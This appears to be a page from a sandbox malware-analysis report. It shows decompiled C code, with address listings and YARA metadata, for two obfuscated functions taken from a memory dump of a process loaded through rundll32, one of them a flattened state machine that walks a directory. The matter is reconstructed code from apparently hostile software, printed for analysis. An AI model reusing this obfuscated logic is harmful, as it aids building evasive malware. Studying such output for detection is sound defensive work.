                                                                                                                      0x001912a7
                                                                                                                      0x001912a7
                                                                                                                      0x001911aa
                                                                                                                      0x001911b1
                                                                                                                      0x001911c2
                                                                                                                      0x001911c9
                                                                                                                      0x001911ce
                                                                                                                      0x001911d2
                                                                                                                      0x001911e1
                                                                                                                      0x001911e4
                                                                                                                      0x0019120f
                                                                                                                      0x00191227
                                                                                                                      0x00191230
                                                                                                                      0x0019123e
                                                                                                                      0x00191242
                                                                                                                      0x00191245
                                                                                                                      0x00191248
                                                                                                                      0x00191251
                                                                                                                      0x0019125a
                                                                                                                      0x0019125a
                                                                                                                      0x0019125d
                                                                                                                      0x00000000
                                                                                                                      0x0019125d
                                                                                                                      0x001910ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: lR}$&$)K,$.L$:u$Z|$~({
                                                                                                                      • API String ID: 0-3122078039
                                                                                                                      • Opcode ID: d1f7fcd86eaf9d5a1187216a9350842ea404b31f752fb019e45921f68b83075c
                                                                                                                      • Instruction ID: 2b9550f839614f965a33bb2ceea534ce39d3e1c231c8a025d98a825f0a810036
                                                                                                                      • Opcode Fuzzy Hash: d1f7fcd86eaf9d5a1187216a9350842ea404b31f752fb019e45921f68b83075c
                                                                                                                      • Instruction Fuzzy Hash: 77D140B15083819FC368CF65C48995BBBE1FBC4758F148A1DF2DA8A260D3B5D949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0019146E Relevance: 9.0, Strings: 7, Instructions: 241COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 100%
                                                                                                                      			E0019146E(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				unsigned int _v36;
				unsigned int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t243;
				void* _t248;
				void* _t253;
				void* _t260;
				void* _t265;
				void* _t270;
				void* _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t298;
				void* _t299;
				signed int* _t301;
				void* _t309;

				_t301 =  &_v104;
				_v4 = 0xac6d1;
				_v4 = _v4 | 0x81c51043;
				_v4 = _v4 ^ 0x81ca09c2;
				_v8 = 0xb8d74f;
				_v8 = _v8 | 0x3a2284f4;
				_v8 = _v8 ^ 0x3ab94f49;
				_v12 = 0x56dc2c;
				_v12 = _v12 >> 0xf;
				_v12 = _v12 ^ 0x0005485d;
				_v20 = 0x903a48;
				_v20 = _v20 ^ 0xb2572448;
				_v20 = _v20 ^ 0xb2cdfeb2;
				_v24 = 0x1df316;
				_v24 = _v24 * 0x26;
				_t271 = __ecx;
				_v24 = _v24 ^ 0x04774828;
				_t298 = 0;
				_v96 = 0x29fbe6;
				_t299 = 0x412d246;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0x40e6;
				_v96 = _v96 + 0xf8d0;
				_v96 = _v96 ^ 0x3f79ed75;
				_v28 = 0x5f5eb9;
				_v28 = _v28 ^ 0x304beccc;
				_v28 = _v28 ^ 0x301ae6f7;
				_v16 = 0x707b25;
				_v16 = _v16 | 0xc66cf16b;
				_v16 = _v16 ^ 0xc674099c;
				_v68 = 0x422c76;
				_v68 = _v68 >> 5;
				_v68 = _v68 ^ 0x51e03a27;
				_v68 = _v68 ^ 0x51e925f4;
				_v72 = 0x838679;
				_t273 = 0x50;
				_v72 = _v72 / _t273;
				_t274 = 0xb;
				_v72 = _v72 / _t274;
				_v72 = _v72 ^ 0x0007ebfd;
				_v92 = 0x3398da;
				_t275 = 0x26;
				_v92 = _v92 * 0x6d;
				_v92 = _v92 ^ 0x75ca49c7;
				_v92 = _v92 << 6;
				_v92 = _v92 ^ 0x0c9e0967;
				_v48 = 0x734a11;
				_v48 = _v48 >> 0xa;
				_v48 = _v48 ^ 0x00076871;
				_v52 = 0xdc5b30;
				_v52 = _v52 ^ 0x2a73247b;
				_v52 = _v52 ^ 0x2aa1f0d2;
				_v104 = 0x2f7cf6;
				_v104 = _v104 / _t275;
				_v104 = _v104 * 0x41;
				_v104 = _v104 | 0xaae37d31;
				_v104 = _v104 ^ 0xaaffffad;
				_v56 = 0xefab9e;
				_v56 = _v56 >> 9;
				_v56 = _v56 ^ 0x0008ac09;
				_v80 = 0xd17701;
				_t276 = 0x57;
				_v80 = _v80 / _t276;
				_v80 = _v80 + 0xffff6938;
				_v80 = _v80 ^ 0x000bb913;
				_v44 = 0x9eed53;
				_t277 = 0x32;
				_v44 = _v44 * 0x74;
				_v44 = _v44 ^ 0x480bdaeb;
				_v100 = 0xb1cacc;
				_v100 = _v100 ^ 0xb6415150;
				_v100 = _v100 / _t277;
				_t278 = 0x13;
				_v100 = _v100 * 0x1c;
				_v100 = _v100 ^ 0x667becf7;
				_v84 = 0x7272f5;
				_v84 = _v84 | 0x49285dda;
				_v84 = _v84 / _t278;
				_v84 = _v84 ^ 0x03db0e7b;
				_v32 = 0x23e0bb;
				_v32 = _v32 ^ 0xc1a40ef0;
				_v32 = _v32 ^ 0xc18ab8c7;
				_v36 = 0x934e6;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x000f952f;
				_v76 = 0x57f010;
				_t279 = 0x55;
				_v76 = _v76 / _t279;
				_v76 = _v76 | 0x3f39553c;
				_v76 = _v76 ^ 0x3f3ef260;
				_v40 = 0x93d6f8;
				_v40 = _v40 >> 6;
				_v40 = _v40 ^ 0x000a0563;
				_v60 = 0x62e666;
				_v60 = _v60 ^ 0x6bd8a41b;
				_v60 = _v60 * 0x61;
				_v60 = _v60 ^ 0xd19d18b1;
				_v88 = 0xe2190a;
				_v88 = _v88 * 0x56;
				_v88 = _v88 << 0x10;
				_v88 = _v88 * 0x2c;
				_v88 = _v88 ^ 0x1bd8b0be;
				_v64 = 0x7df3ba;
				_v64 = _v64 >> 3;
				_v64 = _v64 << 8;
				_v64 = _v64 ^ 0x0fbc3045;
				goto L1;
				do {
					while(1) {
						L1:
						_t309 = _t299 - 0x5b9992e;
						if(_t309 > 0) {
							break;
						}
						if(_t309 == 0) {
							_t253 = E0018274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x4369ff;
							_t298 = _t298 + _t253;
							continue;
						} else {
							if(_t299 == 0x4369ff) {
								_t298 = _t298 + E0017B782(_t271 + 0x1c, _v60, _v88, _v64);
							} else {
								if(_t299 == 0x240c704) {
									_t260 = E0018274F();
									_t301 = _t301 - 0xc + 0xc;
									_t299 = 0x5b9992e;
									_t298 = _t298 + _t260;
									continue;
								} else {
									if(_t299 == 0x412d246) {
										_t299 = 0x80cf0f0;
										continue;
									} else {
										if(_t299 != 0x47dcd1e) {
											goto L17;
										} else {
											_t265 = E0018274F();
											_t301 = _t301 - 0xc + 0xc;
											_t299 = 0x240c704;
											_t298 = _t298 + _t265;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t298;
					}
					if(_t299 == 0x80cf0f0) {
						_t243 = E0017B782(_t271 + 8, _v4, _v8, _v12);
						_t301 =  &(_t301[2]);
						_t299 = 0xe2e5f52;
						_t298 = _t298 + _t243;
						goto L17;
					} else {
						if(_t299 == 0xa9f5c45) {
							_t248 = E0018274F();
							_t301 = _t301 - 0xc + 0xc;
							_t299 = 0x47dcd1e;
							_t298 = _t298 + _t248;
							goto L1;
						} else {
							if(_t299 != 0xe2e5f52) {
								goto L17;
							} else {
								_t270 = E0018274F();
								_t301 = _t301 - 0xc + 0xc;
								_t299 = 0xa9f5c45;
								_t298 = _t298 + _t270;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t299 != 0xe1ba840);
				goto L20;
			}















































                                                                                                                      0x0019146e
                                                                                                                      0x00191471
                                                                                                                      0x0019147b
                                                                                                                      0x00191483
                                                                                                                      0x0019148b
                                                                                                                      0x00191493
                                                                                                                      0x0019149b
                                                                                                                      0x001914a3
                                                                                                                      0x001914ab
                                                                                                                      0x001914b0
                                                                                                                      0x001914b8
                                                                                                                      0x001914c0
                                                                                                                      0x001914c8
                                                                                                                      0x001914d0
                                                                                                                      0x001914e1
                                                                                                                      0x001914e5
                                                                                                                      0x001914e7
                                                                                                                      0x001914ef
                                                                                                                      0x001914f1
                                                                                                                      0x001914f9
                                                                                                                      0x001914fe
                                                                                                                      0x00191503
                                                                                                                      0x0019150b
                                                                                                                      0x00191513
                                                                                                                      0x0019151b
                                                                                                                      0x00191523
                                                                                                                      0x0019152b
                                                                                                                      0x00191533
                                                                                                                      0x0019153b
                                                                                                                      0x00191543
                                                                                                                      0x0019154b
                                                                                                                      0x00191553
                                                                                                                      0x00191558
                                                                                                                      0x00191560
                                                                                                                      0x00191568
                                                                                                                      0x00191576
                                                                                                                      0x0019157b
                                                                                                                      0x00191585
                                                                                                                      0x0019158a
                                                                                                                      0x00191590
                                                                                                                      0x00191598
                                                                                                                      0x001915a5
                                                                                                                      0x001915a6
                                                                                                                      0x001915aa
                                                                                                                      0x001915b2
                                                                                                                      0x001915b7
                                                                                                                      0x001915bf
                                                                                                                      0x001915c7
                                                                                                                      0x001915cc
                                                                                                                      0x001915d4
                                                                                                                      0x001915dc
                                                                                                                      0x001915e4
                                                                                                                      0x001915ec
                                                                                                                      0x001915fa
                                                                                                                      0x00191603
                                                                                                                      0x00191607
                                                                                                                      0x0019160f
                                                                                                                      0x00191617
                                                                                                                      0x0019161f
                                                                                                                      0x00191624
                                                                                                                      0x0019162e
                                                                                                                      0x0019163c
                                                                                                                      0x00191641
                                                                                                                      0x00191647
                                                                                                                      0x00191654
                                                                                                                      0x0019165c
                                                                                                                      0x00191669
                                                                                                                      0x0019166c
                                                                                                                      0x00191670
                                                                                                                      0x00191678
                                                                                                                      0x00191680
                                                                                                                      0x00191690
                                                                                                                      0x00191699
                                                                                                                      0x0019169c
                                                                                                                      0x001916a0
                                                                                                                      0x001916a8
                                                                                                                      0x001916b0
                                                                                                                      0x001916c0
                                                                                                                      0x001916c4
                                                                                                                      0x001916cc
                                                                                                                      0x001916d4
                                                                                                                      0x001916dc
                                                                                                                      0x001916e4
                                                                                                                      0x001916ec
                                                                                                                      0x001916f1
                                                                                                                      0x001916f9
                                                                                                                      0x00191705
                                                                                                                      0x00191708
                                                                                                                      0x0019170c
                                                                                                                      0x00191714
                                                                                                                      0x0019171c
                                                                                                                      0x00191724
                                                                                                                      0x00191729
                                                                                                                      0x00191731
                                                                                                                      0x00191739
                                                                                                                      0x00191746
                                                                                                                      0x0019174a
                                                                                                                      0x00191752
                                                                                                                      0x0019175f
                                                                                                                      0x00191763
                                                                                                                      0x0019176d
                                                                                                                      0x00191771
                                                                                                                      0x00191779
                                                                                                                      0x00191781
                                                                                                                      0x00191786
                                                                                                                      0x0019178b
                                                                                                                      0x0019178b
                                                                                                                      0x00191793
                                                                                                                      0x00191793
                                                                                                                      0x00191793
                                                                                                                      0x00191793
                                                                                                                      0x00191795
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0019179b
                                                                                                                      0x00191824
                                                                                                                      0x00191829
                                                                                                                      0x0019182c
                                                                                                                      0x00191831
                                                                                                                      0x00000000
                                                                                                                      0x0019179d
                                                                                                                      0x001917a3
                                                                                                                      0x001918e1
                                                                                                                      0x001917a9
                                                                                                                      0x001917af
                                                                                                                      0x00191803
                                                                                                                      0x00191808
                                                                                                                      0x0019180b
                                                                                                                      0x0019180d
                                                                                                                      0x00000000
                                                                                                                      0x001917b1
                                                                                                                      0x001917b7
                                                                                                                      0x001917e9
                                                                                                                      0x00000000
                                                                                                                      0x001917b9
                                                                                                                      0x001917bf
                                                                                                                      0x00000000
                                                                                                                      0x001917c5
                                                                                                                      0x001917d8
                                                                                                                      0x001917dd
                                                                                                                      0x001917e0
                                                                                                                      0x001917e5
                                                                                                                      0x00000000
                                                                                                                      0x001917e5
                                                                                                                      0x001917bf
                                                                                                                      0x001917b7
                                                                                                                      0x001917af
                                                                                                                      0x001917a3
                                                                                                                      0x001918e3
                                                                                                                      0x001918ec
                                                                                                                      0x001918ec
                                                                                                                      0x0019183e
                                                                                                                      0x001918ad
                                                                                                                      0x001918b2
                                                                                                                      0x001918b5
                                                                                                                      0x001918ba
                                                                                                                      0x00000000
                                                                                                                      0x00191840
                                                                                                                      0x00191846
                                                                                                                      0x0019188a
                                                                                                                      0x0019188f
                                                                                                                      0x00191892
                                                                                                                      0x00191897
                                                                                                                      0x00000000
                                                                                                                      0x00191848
                                                                                                                      0x0019184e
                                                                                                                      0x00000000
                                                                                                                      0x00191850
                                                                                                                      0x00191863
                                                                                                                      0x00191868
                                                                                                                      0x0019186b
                                                                                                                      0x00191870
                                                                                                                      0x00000000
                                                                                                                      0x00191870
                                                                                                                      0x0019184e
                                                                                                                      0x00191846
                                                                                                                      0x00000000
                                                                                                                      0x001918bc
                                                                                                                      0x001918bc
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %{p$':Q$<U9?$fb$uy?${$s*$4
                                                                                                                      • API String ID: 0-3558008229
                                                                                                                      • Opcode ID: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction ID: d0f41f389ec861c8bcedaf49e22f6ecbfb46d68cbd5b1916d0081ab2974a104c
                                                                                                                      • Opcode Fuzzy Hash: 84da1592223dd1f04f0f3a6d750a6106e25ec91bc4b6139091f670668cf43936
                                                                                                                      • Instruction Fuzzy Hash: 55B123729083819FC358DF69D58A40BFBF1BBD4348F118A2DF4959A260D3B5DA48CF86
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017194C Relevance: 9.0, Strings: 7, Instructions: 223COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 78%
                                                                                                                      			E0017194C(void* __ecx, signed int __edx, void* __edi, void* __eflags, signed int _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				intOrPtr _v156;
				char _v176;
				short _v720;
				short _v722;
				char _v724;
				signed int _v768;
				char _v1288;
				char _v1808;
				void* _t336;
				signed int _t361;
				intOrPtr _t370;
				void* _t373;
				signed int _t379;
				signed int _t394;
				void* _t407;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				void* _t434;
				void* _t435;
				void* _t436;

				_t394 = __edx ^  *(__edi + 3);
				asm("int 0x55");
				_t435 = _t434 - 0x710;
				_t370 = _a8;
				_push(__edi);
				_push(_a20);
				if(__eflags == 0) {
					_push(_a16);
					_push(_a12);
					_push(_t370);
					_push(_a4);
					_push(_t394);
					_push(__ecx);
					E0017CF25(_t336);
					_v16 = 0x6f572e;
				}
				_t436 = _t435 + 0x1c;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 + 0xd52f;
				_t373 = 0x80f983c;
				_v16 = _v16 ^ 0x3310f03a;
				_v16 = _v16 ^ 0x33101333;
				_v60 = 0xed71dd;
				_v60 = _v60 ^ 0x2497a453;
				_t422 = 0x26;
				_v60 = _v60 * 0x72;
				_v60 = _v60 ^ 0x3eb60fda;
				_v112 = 0xa5b0b2;
				_v112 = _v112 + 0x8954;
				_v112 = _v112 ^ 0x00ada628;
				_v108 = 0xe5587e;
				_v108 = _v108 << 9;
				_v108 = _v108 ^ 0xcab3bbf0;
				_v92 = 0x4845fb;
				_v92 = _v92 + 0x365f;
				_v92 = _v92 + 0xdd1a;
				_v92 = _v92 ^ 0x004e95c0;
				_v88 = 0xa51f24;
				_v88 = _v88 ^ 0x4dc3992d;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x002183c7;
				_v28 = 0x92b1f2;
				_v28 = _v28 + 0xdb28;
				_v28 = _v28 ^ 0xc5c4fb2d;
				_v28 = _v28 + 0xffff07a3;
				_v28 = _v28 ^ 0xc5543e55;
				_v56 = 0x45fcf7;
				_v56 = _v56 ^ 0x18f8a820;
				_v56 = _v56 / _t422;
				_v56 = _v56 ^ 0x00a79737;
				_v72 = 0xd5567a;
				_v72 = _v72 ^ 0x96c46f64;
				_v72 = _v72 + 0x1123;
				_v72 = _v72 ^ 0x96131221;
				_v128 = 0xd7fcd2;
				_v128 = _v128 | 0x19fc7ba7;
				_v128 = _v128 ^ 0x19f2013f;
				_v36 = 0xb63dda;
				_v36 = _v36 | 0x57c3443c;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 >> 2;
				_v36 = _v36 ^ 0x000375d9;
				_v120 = 0x9784e5;
				_v120 = _v120 ^ 0x5442b457;
				_v120 = _v120 ^ 0x54d2e3fe;
				_v152 = 0x86b47c;
				_v152 = _v152 | 0x1a648f0d;
				_v152 = _v152 ^ 0x1ae2f95e;
				_v104 = 0xe16033;
				_v104 = _v104 + 0xffff0503;
				_v104 = _v104 ^ 0x00e7872e;
				_v140 = 0x7ced29;
				_v140 = _v140 + 0x937a;
				_v140 = _v140 ^ 0x00718bd8;
				_v148 = 0xa848b7;
				_v148 = _v148 ^ 0xa8d47762;
				_v148 = _v148 ^ 0xa87b6210;
				_v124 = 0xc4055c;
				_v124 = _v124 << 5;
				_v124 = _v124 ^ 0x1882bddf;
				_v80 = 0x58e97;
				_t423 = 0x7c;
				_v80 = _v80 / _t423;
				_v80 = _v80 + 0xffff9366;
				_v80 = _v80 ^ 0xfffe01cd;
				_v48 = 0x77db93;
				_t424 = 0x3a;
				_v48 = _v48 / _t424;
				_v48 = _v48 + 0xffffa5b4;
				_v48 = _v48 >> 6;
				_v48 = _v48 ^ 0x00036e08;
				_v132 = 0x4854bc;
				_t425 = 0x4c;
				_v132 = _v132 * 0x24;
				_v132 = _v132 ^ 0x0a23127f;
				_v84 = 0x297997;
				_v84 = _v84 / _t425;
				_t426 = 0x45;
				_v84 = _v84 * 0x5e;
				_v84 = _v84 ^ 0x003e8360;
				_v24 = 0xba7a12;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x8e2fa782;
				_v24 = _v24 + 0xffffcaa3;
				_v24 = _v24 ^ 0xfad920cc;
				_v64 = 0xf87d94;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x0002c2de;
				_v68 = 0x627eea;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 | 0x4b478a8f;
				_v68 = _v68 ^ 0x4b4b50ae;
				_v32 = 0x4d9af3;
				_v32 = _v32 + 0xffff3fdf;
				_v32 = _v32 | 0x07023235;
				_v32 = _v32 ^ 0xa9cb8ace;
				_v32 = _v32 ^ 0xae825d6e;
				_v144 = 0x2c231c;
				_v144 = _v144 ^ 0x372f588c;
				_v144 = _v144 ^ 0x37050cc1;
				_v40 = 0xed36d5;
				_v40 = _v40 / _t426;
				_v40 = _v40 + 0xffff2e56;
				_v40 = _v40 * 0xd;
				_v40 = _v40 ^ 0x002f5a10;
				_v20 = 0xb226b9;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x7ec33512;
				_v20 = _v20 ^ 0x86eef9df;
				_v20 = _v20 ^ 0xee6f0a5e;
				_v76 = 0xa2d2;
				_v76 = _v76 + 0xffff2403;
				_v76 = _v76 + 0xffff5c56;
				_v76 = _v76 ^ 0xfff84be5;
				_v12 = 0x61529e;
				_v12 = _v12 + 0x826f;
				_v12 = _v12 | 0x315ab852;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x0008d08d;
				_v136 = 0xbe89c0;
				_v136 = _v136 ^ 0x9f3b785a;
				_v136 = _v136 ^ 0x9f8a2ffd;
				_v116 = 0x9615af;
				_v116 = _v116 | 0x7dcb4113;
				_v116 = _v116 ^ 0x7dd5a359;
				_v100 = 0x787e8d;
				_t427 = 0xf;
				_v100 = _v100 * 0x78;
				_v100 = _v100 ^ 0x3874d75c;
				_v96 = 0xce992e;
				_v96 = _v96 << 9;
				_v96 = _v96 | 0x5045bce0;
				_v96 = _v96 ^ 0xdd755c45;
				_v52 = 0xe3c541;
				_t419 = _v100;
				_v52 = _v52 / _t427;
				_v52 = _v52 + 0xffff4fb9;
				_v52 = _v52 | 0x0dbfd8b3;
				_v52 = _v52 ^ 0x0db5e533;
				_v44 = 0xd3f0eb;
				_v44 = _v44 | 0x02fbd4da;
				_v44 = _v44 >> 6;
				_v44 = _v44 + 0xffffa89e;
				_v44 = _v44 ^ 0x000772a1;
				while(1) {
					L6:
					_t407 = 0x2e;
					L7:
					while(_t373 != 0xcf103a) {
						if(_t373 == 0x80f983c) {
							_v156 = _t370;
							_t373 = 0xcf103a;
							continue;
						} else {
							if(_t373 == 0x8bdeaee) {
								__eflags = _v768 & _v16;
								if(__eflags == 0) {
									_t361 = _a16( &_v768,  &_v176);
									asm("sbb ecx, ecx");
									_t379 =  ~_t361 & 0x01058edd;
									goto L14;
								} else {
									__eflags = _v724 - _t407;
									if(_v724 != _t407) {
										L23:
										__eflags = _a4;
										if(__eflags != 0) {
											_push(_v48);
											_push(_v80);
											_push(0x171264);
											E0017E7CE(E0017AB66(_v148, _v124, __eflags), __eflags, _v132, _t370, _v148, _v84, _v24, _v64, _v68,  &_v724);
											_push(_v40);
											_push(_a16);
											_t311 =  &_a12; // 0xee6f0a5e
											_push( *_t311);
											_push( &_v1808);
											_push(_a4);
											L1();
											_t436 = _t436 + 0x40;
											_t361 = E0017AE03(_v20, _v76, _v12, _t364);
											_t407 = 0x2e;
										}
									} else {
										__eflags = _v722;
										if(__eflags != 0) {
											__eflags = _v722 - _t407;
											if(_v722 != _t407) {
												goto L23;
											} else {
												__eflags = _v720;
												if(__eflags != 0) {
													goto L23;
												}
											}
										}
									}
									_t373 = 0xfa4bede;
									continue;
								}
								L32:
							} else {
								if(_t373 == 0x8fff290) {
									_t361 = E0018BAEA( &_v1288, _v152,  &_v768, _v104, _v140);
									_t419 = _t361;
									_t436 = _t436 + 0xc;
									__eflags = _t361 - 0xffffffff;
									if(__eflags != 0) {
										_t373 = 0x8bdeaee;
										goto L6;
									}
								} else {
									if(_t373 == 0xe9f3001) {
										_t361 = E00188C35(_v100, _t419, _v96, _v52, _v44);
									} else {
										if(_t373 != 0xfa4bede) {
											L28:
											__eflags = _t373 - 0x71f77cc;
											if(__eflags != 0) {
												continue;
											} else {
											}
										} else {
											_t278 =  &_v768; // 0x15f5595f
											_t361 = E0018F7FC(_v136, _t419, _v116, _t278);
											asm("sbb ecx, ecx");
											_t379 =  ~_t361 & 0xfa1ebaed;
											L14:
											_t373 = _t379 + 0xe9f3001;
											while(1) {
												L6:
												_t407 = 0x2e;
												goto L7;
											}
										}
									}
								}
							}
						}
						return _t361;
						goto L32;
					}
					_push(_v92);
					_push(_v108);
					_push(0x1712d4);
					E00173BF8(_v28, __eflags, E0017AB66(_v60, _v112, __eflags), _v56, _v72,  &_v1288, _t370);
					E0017AE03(_v128, _v36, _v120, _t354);
					_t436 = _t436 + 0x28;
					_t373 = 0x8fff290;
					_t407 = 0x2e;
					goto L28;
				}
			}































































                                                                                                                      0x0017194c
                                                                                                                      0x0017194f
                                                                                                                      0x00171953
                                                                                                                      0x0017195a
                                                                                                                      0x0017195e
                                                                                                                      0x0017195f
                                                                                                                      0x00171960
                                                                                                                      0x00171962
                                                                                                                      0x00171965
                                                                                                                      0x00171968
                                                                                                                      0x00171969
                                                                                                                      0x0017196c
                                                                                                                      0x0017196d
                                                                                                                      0x0017196e
                                                                                                                      0x00171973
                                                                                                                      0x00171973
                                                                                                                      0x0017197a
                                                                                                                      0x0017197d
                                                                                                                      0x00171983
                                                                                                                      0x0017198a
                                                                                                                      0x0017198f
                                                                                                                      0x00171996
                                                                                                                      0x0017199d
                                                                                                                      0x001719a4
                                                                                                                      0x001719b1
                                                                                                                      0x001719b2
                                                                                                                      0x001719b5
                                                                                                                      0x001719bc
                                                                                                                      0x001719c3
                                                                                                                      0x001719ca
                                                                                                                      0x001719d1
                                                                                                                      0x001719d8
                                                                                                                      0x001719dc
                                                                                                                      0x001719e3
                                                                                                                      0x001719ea
                                                                                                                      0x001719f1
                                                                                                                      0x001719f8
                                                                                                                      0x001719ff
                                                                                                                      0x00171a06
                                                                                                                      0x00171a0d
                                                                                                                      0x00171a11
                                                                                                                      0x00171a18
                                                                                                                      0x00171a1f
                                                                                                                      0x00171a26
                                                                                                                      0x00171a2d
                                                                                                                      0x00171a34
                                                                                                                      0x00171a3b
                                                                                                                      0x00171a42
                                                                                                                      0x00171a4e
                                                                                                                      0x00171a51
                                                                                                                      0x00171a58
                                                                                                                      0x00171a5f
                                                                                                                      0x00171a66
                                                                                                                      0x00171a6d
                                                                                                                      0x00171a74
                                                                                                                      0x00171a7b
                                                                                                                      0x00171a82
                                                                                                                      0x00171a89
                                                                                                                      0x00171a90
                                                                                                                      0x00171a97
                                                                                                                      0x00171a9b
                                                                                                                      0x00171a9f
                                                                                                                      0x00171aa6
                                                                                                                      0x00171aad
                                                                                                                      0x00171ab4
                                                                                                                      0x00171abb
                                                                                                                      0x00171ac5
                                                                                                                      0x00171acf
                                                                                                                      0x00171ad9
                                                                                                                      0x00171ae0
                                                                                                                      0x00171ae7
                                                                                                                      0x00171aee
                                                                                                                      0x00171af8
                                                                                                                      0x00171b02
                                                                                                                      0x00171b0c
                                                                                                                      0x00171b16
                                                                                                                      0x00171b20
                                                                                                                      0x00171b2a
                                                                                                                      0x00171b31
                                                                                                                      0x00171b35
                                                                                                                      0x00171b3e
                                                                                                                      0x00171b4a
                                                                                                                      0x00171b4f
                                                                                                                      0x00171b54
                                                                                                                      0x00171b5b
                                                                                                                      0x00171b62
                                                                                                                      0x00171b6c
                                                                                                                      0x00171b71
                                                                                                                      0x00171b76
                                                                                                                      0x00171b7d
                                                                                                                      0x00171b81
                                                                                                                      0x00171b88
                                                                                                                      0x00171b93
                                                                                                                      0x00171b96
                                                                                                                      0x00171b99
                                                                                                                      0x00171ba0
                                                                                                                      0x00171bae
                                                                                                                      0x00171bb5
                                                                                                                      0x00171bb6
                                                                                                                      0x00171bb9
                                                                                                                      0x00171bc0
                                                                                                                      0x00171bc7
                                                                                                                      0x00171bcb
                                                                                                                      0x00171bd2
                                                                                                                      0x00171bd9
                                                                                                                      0x00171be0
                                                                                                                      0x00171be7
                                                                                                                      0x00171beb
                                                                                                                      0x00171bef
                                                                                                                      0x00171bf6
                                                                                                                      0x00171bfd
                                                                                                                      0x00171c01
                                                                                                                      0x00171c08
                                                                                                                      0x00171c0f
                                                                                                                      0x00171c16
                                                                                                                      0x00171c1d
                                                                                                                      0x00171c24
                                                                                                                      0x00171c2b
                                                                                                                      0x00171c32
                                                                                                                      0x00171c3c
                                                                                                                      0x00171c46
                                                                                                                      0x00171c50
                                                                                                                      0x00171c5c
                                                                                                                      0x00171c5f
                                                                                                                      0x00171c6a
                                                                                                                      0x00171c6d
                                                                                                                      0x00171c74
                                                                                                                      0x00171c7b
                                                                                                                      0x00171c7f
                                                                                                                      0x00171c86
                                                                                                                      0x00171c8d
                                                                                                                      0x00171c94
                                                                                                                      0x00171c9b
                                                                                                                      0x00171ca2
                                                                                                                      0x00171ca9
                                                                                                                      0x00171cb0
                                                                                                                      0x00171cb7
                                                                                                                      0x00171cbe
                                                                                                                      0x00171cc5
                                                                                                                      0x00171cc9
                                                                                                                      0x00171cd0
                                                                                                                      0x00171cda
                                                                                                                      0x00171ce6
                                                                                                                      0x00171cf0
                                                                                                                      0x00171cf7
                                                                                                                      0x00171cfe
                                                                                                                      0x00171d05
                                                                                                                      0x00171d12
                                                                                                                      0x00171d13
                                                                                                                      0x00171d16
                                                                                                                      0x00171d1d
                                                                                                                      0x00171d24
                                                                                                                      0x00171d28
                                                                                                                      0x00171d2f
